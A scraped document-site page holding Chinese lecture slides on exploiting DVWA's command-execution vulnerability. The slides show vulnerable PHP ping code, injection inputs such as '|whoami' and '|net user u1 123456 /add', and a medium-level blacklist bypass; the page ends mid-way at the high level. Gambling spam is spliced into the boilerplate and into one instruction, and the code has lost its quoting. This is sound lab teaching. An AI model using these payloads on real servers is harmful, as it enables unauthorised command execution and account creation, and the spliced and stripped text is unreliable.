- 1、有哪些信誉好的足球投注网站(book118)网站文档一经付费(服务费),不意味着购买了该文档的版权,仅供个人/单位学习、研究之用,不得用于商业用途,未经授权,严禁复制、发行、汇编、翻译或者网络传播等,侵权必究。。
 - 2、本站所有内容均由合作方或网友上传,本站不对文档的完整性、权威性及其观点立场正确性做任何保证或承诺!文档内容仅供研究参考,付费前请自行鉴别。如您付费,意味着您自己接受本站规则且自行承担风险,本站不退款、不进行额外附加服务;查看《如何避免下载的几个坑》。如果您已付费下载过本站文档,您可以点击 这里二次下载。
 - 3、如文档侵犯商业秘密、侵犯著作权、侵犯人身权等,请点击“版权申诉”(推荐),也可以打举报电话:400-050-0827(电话支持时间:9:00-18:30)。
 - 4、该文档为VIP文档,如果想要下载,成为VIP会员后,下载免费。
 - 5、成为VIP后,下载本文档将扣除1次下载权益。下载后,不支持退款、换文档。如有疑问请联系我们。
 - 6、成为VIP后,您将拥有八大权益,权益包括:VIP文档下载权益、阅读免打扰、文档格式转换、高级专利检索、专属身份标志、高级客服、多端互通、版权登记。
 - 7、VIP文档为合作方或网友上传,每下载1次, 网站将根据用户上传文档的质量评分、类型等,对文档贡献者给予高额补贴、流量扶持。如果你也想贡献VIP文档。上传文档
 
第30讲DVWA命令执行漏洞利用任毅
引言上节课学习了命令执行漏洞的基本原理、相关函数与连接符号,本节课我们利用相关的平台进行实操训练。
小测试若有两个命令A和B,A执行在前,B执行在后,使用各个命令连接符,能确保B一定能执行到?|或
学习目标能描述DVWA平台中命令执行漏洞利用方法能在DVWA平台中的低、中、高级别中完成命令执行漏洞实训提升命令执行漏洞防范能力
DVWA平台中命令执行乱码解决方案首先打开dvwa\dvwa\includes目录下的dvwaPage.inc.php文件,有哪些信誉好的足球投注网站utf-8,将第一个utf-8改为GBK,重新启用Apache服务即可。
在命令行使用chcp修改代码页代码页codeUTF-865001简体中文(GB2312)936繁体中文BIG5950日文932美国/加拿大英语437俄文866韩文949
Low级别下命令执行漏洞利用代码分析:?phpif(isset($_POST[Submit])){//Getinput$target=$_REQUEST[ip];//DetermineOSandexecutethepingcommand.if(stristr(php_uname(s),WindowsNT)){//Windows$cmd=shell_exec(ping.$target);}else{//*nix$cmd=shell_exec(ping-c4.$target);}//Feedbackfortheenduserechopre{$cmd}/pre;}?可以看出未做任何过滤。
Low级别下命令执行漏洞利用(1)输入127.0.0.1|whoami,结果如下:
Low级别下命令执行漏洞利用(2)输入127.0.0.1ipconfig,结果如下:
Low级别下命令执行漏洞利用(3)输入127.0.0.1ipconfig
Low级别下命令执行漏洞利用(4)输入127.0.0.1|ipconfig,结果如下:
Low级别下命令执行漏洞利用(5)输入127.0.0.1||ipconfig,结果如下:综上:建议使用|进行测试。
Low级别下命令执行漏洞利用(6)输入127.0.0.1|dird:\(注意输入的斜线应该为\,不是/)
Low级别下命令执行漏洞利用(7)输入127.0.0.1|netuseru1123456/add,长时间未输出结果,转到服务器上,发现添加用户的命令被服务器的杀毒软件拦截,如果服务器没有安装此类杀毒软件,则会被添加用户,非常危险。最后客户端报错,如下两图所示:
Medium级别下命令执行漏洞利用代码如下:?phpif(isset($_POST[Submit])){//Getinput$target=$_REQUEST[ip];//Setblacklist$substitutions=array(=,;=,);//Removeanyofthecharactarsinthearray(blacklist).$target=str_replace(array_keys($substitutions),$substitutions,$target);//DetermineOSandexecutethepingcommand.if(stristr(php_uname(s),WindowsNT)){//Windows$cmd=shell_exec(ping.$target);}else{//*nix$cmd=shell_exec(ping-c4.$target);}//Feedbackfortheenduserechopre{$cmd}/pre;}?从Medium的源代码可以看出,它在Low代码层面上增加了对上传参数的过滤,将上传参数的和;转化为空,但是它仅仅只能过滤和;,我们可以使用、|继续进行命令执行。
high级别下命令执行漏洞利用代码如下:?phpif(isset($_POST[Submit])){//Getinput
您可能关注的文档
最近下载
- 体外诊断试剂质量体系指南.docx VIP
 - 构建和谐人际关系主题班会PPT课件.pptx VIP
 - 语言文明课件.pptx VIP
 - 如何提高土工格栅施工的一次合格率课件.pptx VIP
 - 【期中复习】语文专题 07课内阅读(前4个单元所有课内片段阅读) -2023-2024学年五年级语文下册期中专项复习(部编版).docx VIP
 - 旅行社管理信息系统设计.pptx VIP
 - QBT 4553-2013 轻型登山鞋 行业标准.pdf VIP
 - 军体格斗1~5组合套路汇总.docx VIP
 - 3D工程图学(华中科大)中国大学MOOC慕课 章节测验 客观题答案.docx VIP
 - 心理健康教育标准教案(精选.pptx VIP
 
有哪些信誉好的足球投注网站
 
      
      
文档评论(0)